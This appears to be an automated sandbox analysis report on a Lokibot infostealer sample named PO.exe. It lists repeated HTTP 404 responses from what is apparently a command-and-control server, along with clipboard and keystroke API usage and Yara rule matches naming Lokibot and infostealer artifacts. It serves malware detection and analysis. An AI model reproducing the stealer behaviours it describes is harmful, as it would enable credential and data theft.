Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j%2B48idDGTijysnxo88xGnq%2BdUgDPFGzqseUc51IrWXgbjhDT%2FIngF%2BA5aiKxaH4U7xQoHIvNPDWbsgqSMIEd%2F%2F96LlhXkWAZb8%2Fgw3Vh7O5PdeirF%2F6EnzmNrwo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ee22bca58c93-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1954&rtt_var=977&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pKuL693vHD%2BFf1ERMqGduDReemGxZNHCAsz9eUELQkKv%2BaJjr1v5FAlhCg0u0b1f8wZkjVH3BTnJGI%2B56P2sNd4m5WEDOSGmym1XMJSyYdjajQqZhG%2FawHueW3g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ee2ed94c7c9c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2059&min_rtt=2059&rtt_var=1029&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NbS8kZS6jUjwDGjOZEGFe2KD3rpt08dm0KcuhDNP27577AX%2B9DdhfFGzLj4HB1GzRqK3mwIRo1IsCzzg7n5bKrYypkQSxB%2FcjGCPEumDtbzCG%2FzAKnXrL3z15cw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ee3acfb04370-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1571&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CKGaVSN%2FsdoK6WRlBcfJ6G1JGQJkXsmxrQm07HmmhMgYj8Gw%2Fh9xwjSSzzKuXnjO7kVjfGGu5MMJEIpDbfUGYM6BeUGjohUTERqyUshmb%2BCd55EYg%2Bkre%2FNvdyk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ee46ef1542a7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1624&rtt_var=812&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8HLkD%2F%2FDeiOvDBWoSb0bp4QYbv80xogyZSCkgQ35Z6sfTEyySIVVtbyEeh2gYZjBPB5MfNh4QdRmDMOr2MC32AjHSsaXGVRiTpJYImY2liy4uNRzWQnN8BbIjkI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ee5e1a4742a6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1709&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BZ7uyQ2Lhnqu7kcfH9TjFQQtONFkolGjGuUlYiJTRcYalVtA%2FHoncNz%2FgrAbuzlu4z9%2F7RMIgNRNJnLBPo%2B0yIUJd6rnM4cosdkda1oMxWbR%2BkuF%2FX5EkVcoROU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ee81da3f8ca2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1998&rtt_var=999&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y128Q35gO3dDwJypHOwoUehqyP00h4okHSm6DeLYNHS9ZFeKKaiL9i%2BzBSamo6m7LJq%2BFd5hrSCDcG7%2FjYqAEpCVFHyBap6RgPQ8q0%2FqsF4XGNHnsvIiTnL%2FW6M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ee8dde0e7c7e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=2003&rtt_var=1001&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QSnrH%2F7Ka1Qbfw6eHlF0L%2FlmNIC9ub17b94Px1cdLG3I7QvmSKn%2BivVQtxfI9TJIjOv6crL%2BOWkpz6tsZIXAxrk0RmN4OdaebnGlrK85HDe9dHX9xXQwIBc6cBg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ee9a59968c39-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1932&min_rtt=1932&rtt_var=966&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0PI58ww2pkfvRSUVcRHXSXdsRFsSQXZTP36Y7I5pbYrNuF%2FLtjHxrZ%2B6kbrfsi6Z%2BdA4YlJahy3Kkf2Py%2FndGptWyYDHCK0LsOCvQBRCBuhhefv1nWoyBFPx2Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174eeb24b650f69-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1689&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rqbV6sLYwbTjPEYp0en%2BsZKiYS%2FNymr5oWUaNkhDy3fsGCzegp7kgu07pqJn09F7OiGRUPni75aqkoxFLa%2F9JKtlQg9NM5zoCMqbFkJcRdvY%2F0vKNvKVqttDy%2BA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174eebe6bf77ca5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1967&rtt_var=983&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qnIM5LQ9kd%2F11q9kEvr8Z44aQ4%2BMO%2FNForyNZgP6BpbNMhUqLTIxAP6D9wbUuWzGBnS%2FPJW%2BZT9xzPhCPOkMKvD1c%2F2GFNj%2F57QvoPSUa8EHQ%2F98n1oD9rDnL28%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174eed678658ce9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1898&min_rtt=1898&rtt_var=949&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SZueTq1QpwkI6Ag6LwN4ONVeEBKTiArVb7papH4v4MSFhiFAz53Pw5p8DV9ayzoXSkX4SSnlkHZ%2F2eWYv%2BOaSGb3W%2FX5mazOVQCC%2BPGCsGNfRpmIvUot7HWXajw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174eeef8e331835-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1752&rtt_var=876&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=epsDzxRhKP7%2Bi1h58I2%2BiIZV8j5KxkBPaIgNa1cXeX1krojLfkeU7wDeTFer48uxgbo%2Fo5P2SFDhQQW9VRX7VZ2JK4k0L7lM8YyEXvMGavMe0uA797gDq%2B8YVvA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174eefb892f5e7d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2174&min_rtt=2174&rtt_var=1087&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HnBNFa3tt2I8BPGaUpSKLcl43VsuieUpyIMTB4svT6W1L0IExxjelr8573vlRp2xDmB1Z%2BXPlzx46yzwiVzk4%2B1yLy531YdHPn0de%2FGOx61iVSf4260481XkKkg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ef14786bc343-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1631&rtt_var=815&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=huoxgydmMTKnOn%2BiaTZoeGxg0YnnOPwWyk4NVkxhpwvqsUm2OxHUHoTeji77ZqH68507i01ROxpBDAVR4KM%2F7uewQtA2Rw0KoWNPBZghoYrjUCJZ951gK41RzKc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ef20e8107cae-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:25:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P3VCGhnLIfP27nJ4CMuEXtbZfRF4ALdceW1DASgZEPm24gjcmQRcMW15W5LhJJfeEJ8tc6nRBescobuP4kDXGNb9QquMNTl9BsLCaa9nBiXngtzi6gqI4rHVihw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ef38d91d42af-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1777&rtt_var=888&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:26:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n6JvDQCzzAK38FAJqLXyZAnv7eyiUxgRgc7%2FSXU11A8xEgUmewC88Ggm1XYC%2F5wG2BPBPSdlkdoPZZMa9zqPKZOttuY5XoLDPX21e9u4ytjkHWPRlyW4AdXlNjA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ef451bb40f75-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1651&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:26:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SIeXsx6ZS8Uh7IQ6FtoKTeZl8jtogQBXim4Xhe%2BNKTFRDbOlVei7Ftu9C7LGFdH%2B0dZpIWJaLAmBahMQz87EUuA%2BKdb0leqqAZ2zx1unNtKXNckUgum%2BcFk9rBQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ef513aa64331-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=2001&rtt_var=1000&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:26:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYUEx2xlh0X2rtw9%2Fp1JF81IVl0FB64Zlft7UxI78lyREDRVgLNqxlu9rWgrbq%2FY4zQ5Q4HQT4rAbsl8ShYXCvg2kOHTgXuNJETQwllOhWxWlA7%2FgWkOiy18MPI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ef6a09e46a56-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1559&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:26:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tKQ7YDal3nu1KYOoUGcY9Hy4RfVJJELEGPgS93gg4%2Bw6dOVLWrkjqgfxQs%2Bd9aXvT9DhjEtvbuGhEqptyNnXLB2wWI5m%2BftrFPJf741ENXMMj7GjWZuPg%2BtHlAU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ef7548e94363-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2373&min_rtt=2373&rtt_var=1186&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 04:26:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tqLaTn0%2B030qrKNJTlWri2qkfAkoJdYWeKxl4UK53Ls2k6l14yUAuLJbvicR5zawgdSPVxQILFCYfsgY%2F%2FcGxiCaMJBvWX%2BMkGLNMS6x8ZfOxtsFnH1DCzJIKno%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9174ef8efb68439f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1836&rtt_var=918&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: svchost.exe, svchost.exe, 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp

String found in binary or memory: http://www.ibsensoftware.com/

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_00A04164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00A04164

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_00A04164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00A04164

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_00A03F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00A03F66

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009F001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_009F001C

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_00A1CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00A1CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.PO.exe.b90000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.PO.exe.b90000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.PO.exe.b90000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.PO.exe.b90000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.PO.exe.b90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.PO.exe.b90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.PO.exe.b90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.PO.exe.b90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO.exe.b90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
